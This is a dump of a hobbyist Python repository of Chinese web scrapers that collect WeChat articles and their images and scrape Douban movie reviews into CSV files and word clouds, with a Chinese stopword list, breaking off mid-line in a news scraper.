/spider/get_url_data.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 获取接口资讯数据 6 | -------------------------------------- 7 | @File : get_url_data.py 8 | @Time : 2018/8/26 16:10 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import requests 17 | from lxml import etree 18 | import random 19 | from time import sleep 20 | from selenium import webdriver 21 | 22 | 23 | def getHTMLText(url): 24 | driver = webdriver.PhantomJS(executable_path='D:\\phantomjs-2.1.1-windows\\bin\\phantomjs') # phantomjs的绝对路径 25 | driver.set_page_load_timeout(5) 26 | time.sleep(2) 27 | driver.get(url) # 获取网页 28 | time.sleep(2) 29 | return driver.page_source 30 | 31 | 32 | def getContent(headers, html): 33 | print(html) 34 | 35 | # options = webdriver.ChromeOptions() 36 | # 37 | # options.add_argument('--headless') 38 | # 39 | # driver = webdriver.Chrome(options =options) 40 | # driver.get(url) 41 | # print(url) 42 | # print(driver.page_source) 43 | 44 | 45 | 46 | 47 | if __name__ == '__main__': 48 | headers = { 49 | 'Connection': 'Keep-Alive', 50 | 'Accept': 'text/html, application/xhtml+xml, */*', 51 | 'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3', 52 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36' 53 | } 54 | id_list = ['281239195'] 55 | 56 | url = "http://localhost:92/zx/cont.html?id=" + id_list[0] + "&type=jrtt" 57 | html = getHTMLText(url) 58 | getContent(headers, html) 59 | 60 | 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /spider/gzh/GZH.py: -------------------------------------------------------------------------------- 1 | """ 2 | 
!/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | 1. 爬取文章 7 | 2. 下载图片 8 | 3. 替换图片 9 | 4. 输出html 10 | -------------------------------- 11 | @Time : 2019/5/29 11:54 12 | @File : GZH.py 13 | @Software: PyCharm 14 | -------------------------------- 15 | @Author : lixj 16 | @contact : lixj_zj@163.com 17 | """ 18 | 19 | import requests 20 | from lxml import etree 21 | import logging 22 | import random 23 | import re 24 | import os 25 | import user_agent as userAgent 26 | import time 27 | import uuid 28 | 29 | # logging.basicConfig函数对日志的输出格式及方式做相关配置 30 | logging.basicConfig(level=logging.INFO, 31 | format='%(asctime)s - %(filename)s[line:%(lineno)d] ' 32 | '- %(levelname)s: %(message)s') 33 | 34 | 35 | def get_random_ip(): 36 | """ 37 | 获取随机的IP地址 38 | :return: 39 | """ 40 | with open("ip_pool.txt", "r") as f: # 构建IP池 41 | content = f.read() 42 | cont_list = content.split("', '") 43 | ip_list = cont_list[1:len(cont_list) - 1] 44 | random_ip = random.choice(ip_list) 45 | proxy_ip = "http://" + random_ip 46 | proxies = {"http": proxy_ip} 47 | logging.info("random ip is {}".format(proxies)) 48 | return proxies 49 | 50 | 51 | def download_img(img_link_list, img_path): 52 | """ 53 | 下载所有图片 54 | :param img_link_list: 55 | :param img_path: 56 | :return: 57 | """ 58 | if not os.path.exists(img_path): 59 | os.makedirs(img_path) 60 | os.chdir(img_path) # 切换下载图片的目录 61 | for img_num, img_link in enumerate(img_link_list): 62 | img = requests.get(img_link, headers=headers, proxies=proxies) 63 | try: 64 | suffix = img_link.split("=")[-1] 65 | if suffix in ["jpeg","png","jpg","gif","webp"]: 66 | with open(str(img_num) + "." 
+ suffix, "wb") as f: 67 | f.write(img.content) 68 | logging.info("Download {img_num} th img succeed!".format(img_num=str(img_num))) 69 | else: 70 | continue 71 | except Exception as e: 72 | logging.error(str(e)) 73 | 74 | 75 | def getimg_link_list(url): 76 | """ 77 | 获取所有图片链接 78 | :param url: 79 | :return: 80 | """ 81 | try: 82 | req = requests.get(url, headers=headers, proxies=proxies) 83 | struct = etree.HTML(req.text) 84 | # 获取所有图片地址 85 | x_path = "//img/@data-src" # 匹配任意深度含有data-src熟悉的图片,获取链接 86 | img_link_list = struct.xpath(x_path) 87 | logging.info("get img link list succeed!") 88 | return img_link_list 89 | except Exception as e: 90 | logging.error(str(e)) 91 | 92 | 93 | def download_html(url, html_path): 94 | """ 95 | 下载html页面,命名为文章名.html 96 | :param url: 97 | :param html_path: 98 | :return: 99 | """ 100 | if not os.path.exists(html_path): 101 | os.makedirs(html_path) 102 | os.chdir(html_path) # 切换根目录 103 | try: 104 | req = requests.get(url, headers=headers, proxies=proxies) 105 | struct = etree.HTML(req.text) 106 | x_path = "//h2/text()" 107 | title = struct.xpath(x_path) 108 | html_name = title[0].replace("\\n", "").strip() 109 | with open(html_name + ".html", "w+", encoding="utf-8") as f: 110 | f.write(req.text) 111 | logging.info("download old html succeed!") 112 | return html_name 113 | except Exception as e: 114 | logging.error(str(e)) 115 | 116 | 117 | def replace_img(html_path, html_name, img_path): 118 | """ 119 | 替换图片 120 | :param html_path: 121 | :param html_name: 122 | :param img_path: 123 | :return: 124 | """ 125 | path_list = os.listdir(img_path) 126 | path_list.sort(key=lambda x: int(x.split(".")[0])) # 顺序读取 127 | os.chdir(html_path) 128 | with open(html_name + ".html", "r+", encoding="utf-8") as f: 129 | html = f.read() 130 | pattern = r'' 131 | img_re = re.compile(pattern) 132 | img_list = re.findall(img_re, html) 133 | 134 | for img, path in zip(imglist, path_list): 135 | img_tag_list = img.split(" />") 136 | fullimg_path = img_path + 
"\\" + path 137 | new_img_tag = img_tag_list[0] + "src=" + "\"" + fullimg_path + "\"" + " />" 138 | if html.__contains__(img): 139 | new_html = html.replace(img, new_img_tag) 140 | html = new_html 141 | logging.info("replace img succeed!") 142 | return html 143 | 144 | 145 | def del_file(path, html_name): 146 | """ 147 | 删除指定文件 148 | :param path: 149 | :param html_name: 150 | :return: 151 | """ 152 | try: 153 | os.remove(path + os.path.altsep + html_name + ".html") 154 | logging.info("remove file {html_name}.html done!".format(html_name=html_name)) 155 | except Exception as e: 156 | logging.error(str(e)) 157 | 158 | 159 | def write_img_to_new_html(newhtml_path, html, html_name): 160 | """ 161 | 重写文件中的图片,生成新的html 162 | :param newhtml_path: 163 | :param html: 164 | :param html_name: 165 | :return: 166 | """ 167 | os.chdir(newhtml_path) 168 | try: 169 | # 直接覆盖原来没有图片的文件 170 | with open(html_name + ".html", "w+", encoding="utf-8") as f: 171 | f.write(html) 172 | logging.info("rewrite img to new html succeed!") 173 | except Exception as e: 174 | logging.error(str(e)) 175 | 176 | 177 | def get_random_path_name(): 178 | """ 179 | 获取随机数命名文件夹 180 | :return: 181 | """ 182 | return time.strftime("%Y-%m-%d_%H-%M-%S", time.localtime()) + "_" + str(uuid.uuid4()) 183 | 184 | 185 | def run(url): 186 | # 定义常量 187 | root_path = os.path.dirname(__file__) + os.path.altsep + "GZH" + os.path.altsep + get_random_path_name() 188 | img_path = root_path + os.path.altsep + "img" 189 | 190 | # 下载HTML文件 191 | html_name = download_html(url, root_path) 192 | 193 | # 下载图片 194 | img_list = getimg_link_list(url) 195 | download_img(img_list, img_path) 196 | 197 | # 替换图片写入新的HTML 198 | after_replace_img_html = replace_img(root_path, html_name, img_path) 199 | write_img_to_new_html(root_path, after_replace_img_html, html_name) 200 | 201 | 202 | if __name__ == '__main__': 203 | global proxies, headers 204 | headers = userAgent.UserAgent().get_headers() 205 | # 随机IP 206 | proxies = get_random_ip() 207 | 
208 | url = "https://mp.weixin.qq.com/s/LzRn5vaNayeJ3Z41ZpLqxA" 209 | 210 | run(url) 211 | -------------------------------------------------------------------------------- /spider/movieReview/cleanData.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 数据处理 6 | -------------------------------------- 7 | @File : cleanData.py 8 | @Time : 2018/8/25 16:33 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import re 17 | 18 | def cleanData(HTMLDic): 19 | # for key in HTMLDic.keys(): 20 | print(type(HTMLDic[str(6)])) # 内容 21 | content = HTMLDic[str(6)] 22 | for i in range(len(content)): 23 | content[i] = re.sub(r'\*|\'|\ |\\|\/', "", str(content[i])) 24 | print(content) 25 | ''' 26 | jasdfj 27 | ''' 28 | 29 | 30 | def getHTMLDic(): 31 | tempFile = "./cleanData.txt" 32 | with open(tempFile, "r", encoding = "utf-8") as f: 33 | tempStr = f.read() 34 | tempDic = eval(tempStr) # str to dic 35 | return tempDic 36 | 37 | 38 | def main(): 39 | HTMLDic = getHTMLDic() 40 | cleanData(HTMLDic) 41 | 42 | main() 43 | 44 | -------------------------------------------------------------------------------- /spider/movieReview/film.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 爬取电影影评 6 | -------------------------------------- 7 | @File : film.py 8 | @Time : 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | ''' 17 | requests+bs4+jieba 18 | 19 | IPO 20 | Input: 电影网站链接 21 | Process: 网站链接 - 电影链接 - 评论处理 22 | Output: 词云图 
23 | ''' 24 | 25 | import os 26 | import sys 27 | import requests 28 | import re 29 | import jieba 30 | import pandas as pd 31 | import numpy 32 | from pyecharts import WordCloud 33 | from bs4 import BeautifulSoup as bs 34 | 35 | 36 | # 获取电影 37 | def getNowPlayingMovie(url): 38 | r = requests.get(url) 39 | html = r.text 40 | soup = bs(html, "html.parser") 41 | nowplaying_movie = soup.find_all("div", id = "nowplaying") 42 | nowplaying_movie_list = nowplaying_movie[0].find_all("li", class_ = "list-item") # [0] 43 | movieList = [] 44 | for oneMovie in nowplaying_movie_list: 45 | movieDict = {} # 列表中的元组存储数据 46 | movieDict["id"] = oneMovie["data-subject"] # 通过css属性标签直接获取属性值 47 | movieDict["name"] = oneMovie["data-title"] 48 | movieList.append(movieDict) 49 | return movieList 50 | 51 | # 获取评论 52 | def getCommentsById(moviedId, pageNum): 53 | for i in range(pageNum): 54 | url = "https://movie.douban.com/subject/" + moviedId + "/comments?start=0&limit=" + str(i) 55 | 56 | # 处理特殊文字、符号的乱码问题 57 | non_bmp_map = dict.fromkeys(range(0x10000, sys.maxunicode + 1), 0xfffd) 58 | r = requests.get(url) 59 | html = r.text 60 | html = html.translate(non_bmp_map) 61 | soup = bs(html, "html.parser") 62 | comments = soup.find_all("div", id = "comments") 63 | comments_list = comments[0].find_all("p", class_="") 64 | 65 | commentsResult = [] 66 | for comment in comments_list: 67 | if comment.string == None or comment.string == "": 68 | continue 69 | else: 70 | commentsResult.append(comment.string.strip()) 71 | return commentsResult 72 | 73 | # 数据处理 74 | def dataWranging(dataList): 75 | ## 1. 筛选所有评论文字 76 | dataStr = "" 77 | for data in dataList: 78 | dataStr = dataStr + data 79 | patten = re.compile(r"[\u4e00-\u9fa5]+") # 匹配所有文字 80 | filterData = re.findall(patten, dataStr) 81 | wrangedData = "".join(filterData) # List to String 82 | 83 | ## 2. 分词 84 | segment = jieba.lcut(wrangedData) # 结巴分词 85 | words_df = pd.DataFrame({'segment': segment}) # pandas显示分词结果 86 | 87 | ## 3. 
除去停用词(设置chineseStopWords.txt文件为utf-8编码) 88 | stopwords = pd.read_csv(".\stopWords.txt", index_col = False, quoting = 3, sep = "\t", names = ["stopword"]) 89 | keyWords = words_df[~words_df.segment.isin(stopwords.stopword)] 90 | keyWordsList = [] 91 | temp = list(keyWords.as_matrix()) # 返回向量组成的列表 92 | for i in range(len(keyWords)): 93 | keyWordsList.append(temp[i][0]) 94 | 95 | ## 4. 词频统计 96 | keyWordDict = {} 97 | for keyWord in keyWordsList: 98 | if keyWord not in keyWordDict: 99 | keyWordDict[keyWord] = 1 100 | else: 101 | keyWordDict[keyWord] += 1 102 | keyWordDict = sorted(keyWordDict.items(), key = lambda x:x[1], reverse = True) # 按照频率排序 103 | return keyWordDict[:100] 104 | 105 | # 绘制词云图 106 | def wordCloud(keyWordDict, label): 107 | x = []; y = [] 108 | for i in range(len(keyWordDict)): 109 | x.append(keyWordDict[i][0]) 110 | y.append(keyWordDict[i][1]) 111 | wordCloud = WordCloud(label, width = 1300, height = 620) 112 | wordCloud.add("", x, y, word_size_range = [20, 100], shape = "circle") 113 | wordCloud.render() 114 | os.system(r"render.html") 115 | 116 | 117 | def main(): 118 | url = "https://movie.douban.com/cinema/nowplaying/shanghai/" 119 | # movieList = getNowPlayingMovie(url) 120 | 121 | pageNum = 5 122 | moviedId = "26363254" 123 | commentsResult = getCommentsById(moviedId, pageNum) 124 | 125 | keyWordDict = dataWranging(commentsResult) 126 | 127 | label = "词云图" 128 | wordCloud(keyWordDict, label) 129 | 130 | if __name__ == "__main__": 131 | main() 132 | 133 | 134 | -------------------------------------------------------------------------------- /spider/movieReview/filmComments.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 获取豆瓣影评 6 | -------------------------------------- 7 | @File : filmComments.py 8 | @Time : 9 | @Software : PyCharm 10 | -------------------------------------- 11 | 
@Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | 17 | """ 18 | requests + Xpath + pandas + MongoDB 19 | IPO: 20 | input: url 21 | process: 获取HTML页面内容,Xpath解析,pandas数据处理,数据写入csv文件,数据存入数据库 22 | output: csv文件、存入到mongodb 23 | 24 | 评论内容解析: 25 | id 26 | name 27 | recommend 28 | time 29 | title 30 | content https://movie.douban.com/review/5199026 + id 31 | useful 32 | useless 33 | comment 34 | res_name 35 | res_time 36 | res_content 37 | 38 | 问题: 39 | 1. 评论解析为空,适配不同的标签 √ 40 | 2. 评论文字过多,csv文件中单个单元格错乱 (设置阈值,大于则压缩或截取部分内容) 41 | 3. IP被封,调试问题 (将爬取下来的内容存入临时文件中,从文件中读取数据) 42 | 4. 数据清理,存储为文件 43 | """ 44 | 45 | import requests 46 | import re 47 | from lxml import etree 48 | import pandas as pd 49 | import csv 50 | import codecs 51 | import traceback 52 | import random 53 | 54 | # 选取随机的IP地址 55 | def getRandomIP(): 56 | with open("./ip_pool.txt", "r") as f: 57 | content = f.read() 58 | contList = content.split("', '") 59 | ipList = contList[1:len(contList)-1] 60 | random_ip = random.choice(ipList) 61 | proxy_ip = "http://" + random_ip 62 | proxies = {"http" : proxy_ip } 63 | return proxies 64 | 65 | def getHTMLContent(url, headers, proxies): 66 | res = requests.get(url, headers = headers, proxies = proxies) 67 | struct = etree.HTML(res.text) 68 | 69 | dic = {} 70 | filmName = struct.xpath('//div[@id="content"]/h1/text()') 71 | dic["0"] = filmName 72 | IDList = struct.xpath('//div[@class="main review-item"]/@id') 73 | dic["1"] = IDList 74 | nameList = struct.xpath('//a[@class="name"]/text()') 75 | dic["2"] = nameList 76 | recommendList = struct.xpath('//header[@class="main-hd"]/span/@title') 77 | dic["3"] = recommendList 78 | timeList = struct.xpath('//span[@class="main-meta"]/text()') 79 | dic["4"] = timeList 80 | titleList = struct.xpath('//div[@class="main-bd"]/h2/a/text()') 81 | dic["5"] = titleList 82 | 83 | contentList = [] 84 | for userid in IDList: 85 | contentURL = "https://movie.douban.com/review/" + userid 86 | r = 
requests.get(contentURL, headers = headers, proxies = proxies) 87 | contStruct = etree.HTML(r.text) 88 | fullContentOne = stripForList(contStruct.xpath('//div[@class="review-content clearfix"]/text()')) 89 | fullContentTwo = stripForList(contStruct.xpath('//div[@class="review-content clearfix"]/p/text()')) 90 | resultContent = fullContentOne + fullContentTwo # list合并 91 | contentList.append(resultContent) 92 | dic["6"] = contentList 93 | 94 | usefulList = stripForList(struct.xpath('//a[@title="有用"]/span/text()')) 95 | dic["7"] = usefulList 96 | uselessList = stripForList(struct.xpath('//a[@title="没用"]/span/text()')) 97 | dic["8"] = uselessList 98 | commentList = struct.xpath('//a[@class="reply"]/text()') 99 | dic["9"] = commentList 100 | 101 | with open("./temp2.txt", "w", encoding = "utf-8") as f: 102 | f.write(str(dic)) 103 | 104 | return dic 105 | 106 | def writeData2CSV(HTMLDic): 107 | csv_col_name = ["主题", "用户ID", "用户名", "推荐力度", "评论时间", "评论标题", "评论内容", "有用个数", "没用个数", "回应内容"] 108 | resultDic = {} 109 | 110 | HTMLDic = cleanData(HTMLDic) 111 | 112 | try: 113 | for i in range(1, len(csv_col_name)): 114 | resultDic[csv_col_name[i]] = HTMLDic[str(i)] 115 | dataframe = pd.DataFrame(resultDic) 116 | dataframe.to_csv("./test2.csv", sep=',', encoding = "utf_8_sig", columns = csv_col_name) # 解决中文在csv文件中乱码 117 | except: 118 | traceback.print_exception 119 | 120 | 121 | def cleanData(HTMLDic): 122 | print("begin clean...") 123 | dic = {'!,':'!', '……,':'……', '?,':'?', ',,':''} 124 | for j in range(len(HTMLDic)): 125 | if j == 6: # 清理内容 126 | for i in range(len(HTMLDic[str(j)])): 127 | HTMLDic[str(j)][i] = re.sub(r'\*|\'|\[|\]|\ |\\|\/', "", str(HTMLDic[str(j)][i])) 128 | for key,value in dic.items(): 129 | HTMLDic[str(j)][i] = HTMLDic[str(j)][i].replace(key, value) 130 | else: 131 | continue 132 | 133 | return HTMLDic 134 | 135 | 136 | def getHTMLDic(): 137 | tempFile = "./temp2.txt" 138 | tempStr = "" 139 | with open(tempFile, "r", encoding = "utf-8") as f: 140 | tempStr 
= f.read() 141 | tempDic = eval(tempStr) # str to dic 142 | return tempDic 143 | 144 | 145 | def stripForList(targetList): 146 | result = [] 147 | for target in targetList: 148 | result.append(target.strip()) 149 | return result 150 | 151 | 152 | def main(): 153 | url = "https://movie.douban.com/subject/1292212/reviews" 154 | headers = { 155 | 'Connection': 'Keep-Alive', 156 | 'Accept': 'text/html, application/xhtml+xml, */*', 157 | 'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3', 158 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36' 159 | } 160 | #proxies = getRandomIP() 161 | #HTMLDic = getHTMLContent(url, headers, proxies) 162 | HTMLDic = getHTMLDic() 163 | writeData2CSV(HTMLDic) 164 | 165 | if __name__ == "__main__": 166 | main() 167 | 168 | 169 | -------------------------------------------------------------------------------- /spider/movieReview/stopWords.txt: -------------------------------------------------------------------------------- 1 | 的 2 | 一 3 | 不 4 | 在 5 | 人 6 | 有 7 | 是 8 | 为 9 | 以 10 | 于 11 | 上 12 | 他 13 | 而 14 | 后 15 | 之 16 | 来 17 | 及 18 | 了 19 | 因 20 | 下 21 | 可 22 | 到 23 | 由 24 | 这 25 | 与 26 | 也 27 | 此 28 | 但 29 | 并 30 | 个 31 | 其 32 | 已 33 | 无 34 | 小 35 | 我 36 | 们 37 | 起 38 | 最 39 | 再 40 | 今 41 | 去 42 | 好 43 | 只 44 | 又 45 | 或 46 | 很 47 | 亦 48 | 某 49 | 把 50 | 那 51 | 你 52 | 乃 53 | 它 54 | 吧 55 | 被 56 | 比 57 | 别 58 | 趁 59 | 当 60 | 从 61 | 到 62 | 得 63 | 打 64 | 凡 65 | 儿 66 | 尔 67 | 该 68 | 各 69 | 给 70 | 跟 71 | 和 72 | 何 73 | 还 74 | 即 75 | 几 76 | 既 77 | 看 78 | 据 79 | 距 80 | 靠 81 | 啦 82 | 了 83 | 另 84 | 么 85 | 每 86 | 们 87 | 嘛 88 | 拿 89 | 哪 90 | 那 91 | 您 92 | 凭 93 | 且 94 | 却 95 | 让 96 | 仍 97 | 啥 98 | 如 99 | 若 100 | 使 101 | 谁 102 | 虽 103 | 随 104 | 同 105 | 所 106 | 她 107 | 哇 108 | 嗡 109 | 往 110 | 哪 111 | 些 112 | 向 113 | 沿 114 | 哟 115 | 用 116 | 于 117 | 咱 118 | 则 119 | 怎 120 | 曾 121 | 至 122 | 致 123 | 着 124 | 诸 125 | 自 126 | 啊 127 | 阿 128 | 哎 129 | 哎呀 130 | 哎哟 131 | 
唉 132 | 俺 133 | 俺们 134 | 按 135 | 按照 136 | 吧 137 | 吧哒 138 | 把 139 | 罢了 140 | 被 141 | 本 142 | 本着 143 | 比 144 | 比方 145 | 比如 146 | 鄙人 147 | 彼 148 | 彼此 149 | 边 150 | 别 151 | 别的 152 | 别说 153 | 并 154 | 并且 155 | 不比 156 | 不成 157 | 不单 158 | 不但 159 | 不独 160 | 不管 161 | 不光 162 | 不过 163 | 不仅 164 | 不拘 165 | 不论 166 | 不怕 167 | 不然 168 | 不如 169 | 不特 170 | 不惟 171 | 不问 172 | 不只 173 | 朝 174 | 朝着 175 | 趁 176 | 趁着 177 | 乘 178 | 冲 179 | 除 180 | 除此之外 181 | 除非 182 | 除了 183 | 此 184 | 此间 185 | 此外 186 | 从 187 | 从而 188 | 出 189 | 打 190 | 待 191 | 但 192 | 但是 193 | 当 194 | 当着 195 | 到 196 | 得 197 | 的 198 | 的话 199 | 等 200 | 等等 201 | 地 202 | 第 203 | 对 204 | 对于 205 | 多少 206 | 而 207 | 而况 208 | 而且 209 | 而是 210 | 而外 211 | 而言 212 | 而已 213 | 尔后 214 | 反过来 215 | 反过来说 216 | 反之 217 | 非但 218 | 非徒 219 | 否则 220 | 嘎 221 | 嘎登 222 | 刚 223 | 刚刚 224 | 该 225 | 赶 226 | 个 227 | 各 228 | 各个 229 | 各位 230 | 各种 231 | 各自 232 | 给 233 | 根据 234 | 跟 235 | 故 236 | 故此 237 | 固然 238 | 关于 239 | 管 240 | 归 241 | 果然 242 | 果真 243 | 过 244 | 哈 245 | 哈哈 246 | 呵 247 | 和 248 | 何 249 | 何处 250 | 何况 251 | 何时 252 | 嘿 253 | 哼 254 | 哼唷 255 | 呼哧 256 | 乎 257 | 哗 258 | 还是 259 | 还有 260 | 换句话说 261 | 换言之 262 | 或 263 | 或是 264 | 或者 265 | 极了 266 | 及 267 | 及其 268 | 及至 269 | 即 270 | 即便 271 | 即或 272 | 即令 273 | 即若 274 | 即使 275 | 几 276 | 几时 277 | 己 278 | 既 279 | 既然 280 | 既是 281 | 继而 282 | 加之 283 | 假如 284 | 假若 285 | 假使 286 | 鉴于 287 | 将 288 | 较 289 | 较之 290 | 叫 291 | 接着 292 | 结果 293 | 借 294 | 紧接着 295 | 进而 296 | 尽 297 | 尽管 298 | 经 299 | 经过 300 | 就 301 | 就是 302 | 就是说 303 | 据 304 | 具体地说 305 | 具体说来 306 | 开始 307 | 开外 308 | 靠 309 | 咳 310 | 可 311 | 可见 312 | 可是 313 | 可以 314 | 况且 315 | 啦 316 | 来 317 | 来着 318 | 离 319 | 例如 320 | 哩 321 | 连 322 | 连同 323 | 两者 324 | 了 325 | 临 326 | 另 327 | 另外 328 | 另一方面 329 | 论 330 | 嘛 331 | 吗 332 | 慢说 333 | 漫说 334 | 冒 335 | 么 336 | 每 337 | 每当 338 | 们 339 | 莫若 340 | 某 341 | 某个 342 | 某些 343 | 拿 344 | 哪 345 | 哪边 346 | 哪儿 347 | 哪个 348 | 哪里 349 | 哪年 350 | 哪怕 351 | 哪天 352 | 哪些 353 | 哪样 354 | 那 355 | 那边 356 | 那儿 357 | 那个 358 | 那会儿 359 | 那里 360 | 那么 361 | 
那么些 362 | 那么样 363 | 那时 364 | 那些 365 | 那样 366 | 乃 367 | 乃至 368 | 呢 369 | 能 370 | 你 371 | 你们 372 | 您 373 | 宁 374 | 宁可 375 | 宁肯 376 | 宁愿 377 | 哦 378 | 呕 379 | 啪达 380 | 旁人 381 | 呸 382 | 凭 383 | 凭借 384 | 其 385 | 其次 386 | 其二 387 | 其他 388 | 其它 389 | 其一 390 | 其余 391 | 其中 392 | 却 393 | 去 394 | 起 395 | 起见 396 | 起见 397 | 岂但 398 | 恰恰相反 399 | 前后 400 | 前者 401 | 且 402 | 然而 403 | 然后 404 | 然则 405 | 让 406 | 人家 407 | 任 408 | 任何 409 | 任凭 410 | 如 411 | 如此 412 | 如果 413 | 如何 414 | 如其 415 | 如若 416 | 如上所述 417 | 若 418 | 若非 419 | 若是 420 | 啥 421 | 上下 422 | 尚且 423 | 设若 424 | 设使 425 | 甚而 426 | 甚么 427 | 甚至 428 | 省得 429 | 时候 430 | 十分 431 | 什么 432 | 什么样 433 | 使得 434 | 是 435 | 是的 436 | 首先 437 | 谁 438 | 谁知 439 | 顺 440 | 顺着 441 | 似的 442 | 虽 443 | 虽然 444 | 虽说 445 | 虽则 446 | 随 447 | 随着 448 | 所 449 | 所以 450 | 他 451 | 他们 452 | 他人 453 | 它 454 | 它们 455 | 她 456 | 她们 457 | 倘 458 | 倘或 459 | 倘然 460 | 倘若 461 | 倘使 462 | 腾 463 | 替 464 | 通过 465 | 同 466 | 同时 467 | 哇 468 | 万一 469 | 往 470 | 望 471 | 为 472 | 为何 473 | 为了 474 | 为什么 475 | 为着 476 | 喂 477 | 嗡嗡 478 | 我 479 | 我们 480 | 呜 481 | 呜呼 482 | 乌乎 483 | 无论 484 | 无宁 485 | 毋宁 486 | 嘻 487 | 吓 488 | 相对而言 489 | 像 490 | 向 491 | 向着 492 | 嘘 493 | 呀 494 | 焉 495 | 沿 496 | 沿着 497 | 要 498 | 要不 499 | 要不然 500 | 要不是 501 | 要么 502 | 要是 503 | 也 504 | 也罢 505 | 也好 506 | 一一 507 | ——— 508 | 一般 509 | 一边 510 | 一会儿 511 | 一旦 512 | 一定 513 | 一点点 514 | 一方面 515 | 一面 516 | 一来 517 | 一起 518 | 一切 519 | 一下 520 | 一下子 521 | 一样 522 | 一些 523 | 一则 524 | 一直 525 | 依 526 | 依照 527 | 矣 528 | 以 529 | 以便 530 | 以及 531 | 以免 532 | 以至 533 | 以至于 534 | 以致 535 | 抑或 536 | 因 537 | 因此 538 | 因而 539 | 因为 540 | 哟 541 | 用 542 | 由 543 | 由此可见 544 | 由于 545 | 有 546 | 有的 547 | 有关 548 | 有些 549 | 又 550 | 于 551 | 于是 552 | 于是乎 553 | 与 554 | 与此同时 555 | 与否 556 | 与其 557 | 越是 558 | 云云 559 | 哉 560 | 再说 561 | 再者 562 | 在 563 | 在下 564 | 咱 565 | 咱们 566 | 则 567 | 怎 568 | 怎么 569 | 怎么办 570 | 怎么样 571 | 怎样 572 | 咋 573 | 照 574 | 照着 575 | 者 576 | 这 577 | 这边 578 | 这儿 579 | 这个 580 | 这会儿 581 | 这就是说 582 | 这里 583 | 这么 584 | 这么点儿 585 | 这么些 586 | 这么样 587 | 这时 
588 | 这些 589 | 这样 590 | 正如 591 | 吱 592 | 之 593 | 之类 594 | 之所以 595 | 之一 596 | 只是 597 | 只限 598 | 只要 599 | 只有 600 | 至 601 | 至于 602 | 诸位 603 | 着 604 | 着呢 605 | 自 606 | 自从 607 | 自个儿 608 | 自各儿 609 | 自己 610 | 自家 611 | 自身 612 | 综上所述 613 | 总的来看 614 | 总的来说 615 | 总的说来 616 | 总而言之 617 | 总之 618 | 纵 619 | 纵令 620 | 纵然 621 | 纵使 622 | 遵照 623 | 作为 624 | 兮 625 | 呃 626 | 呗 627 | 咚 628 | 咦 629 | 喏 630 | 啐 631 | 喔唷 632 | 嗬 633 | 嗯 634 | 嗳 635 | 也许 636 | 人 637 | 前 638 | 令 639 | 份 640 | 件 641 | 伏 642 | 众 643 | 众多 644 | 会 645 | 位 646 | 做 647 | 停 648 | 顶 649 | 先 650 | 先前 651 | 全 652 | 公斤 653 | 其实 654 | 内 655 | 已 656 | 再 657 | 小 658 | 大 659 | 还 660 | 里 661 | 都 662 | 部 663 | 遍 664 | 道 665 | 说 666 | 只 667 | 后 668 | 太 669 | 看 670 | 年 671 | 很 672 | 才 673 | 时 674 | 更 675 | 最 676 | 本报 677 | 讯 678 | 演 679 | 片 -------------------------------------------------------------------------------- /spider/news/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/6 22:44 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /spider/news/get_news_url.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/5 19:39 8 | @File : getNewsUrl.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | from lxml import etree 17 | import user_agent 18 | import random_ip 19 | 20 | url = 'https://news.hao123.com/wangzhi' 21 | re = 
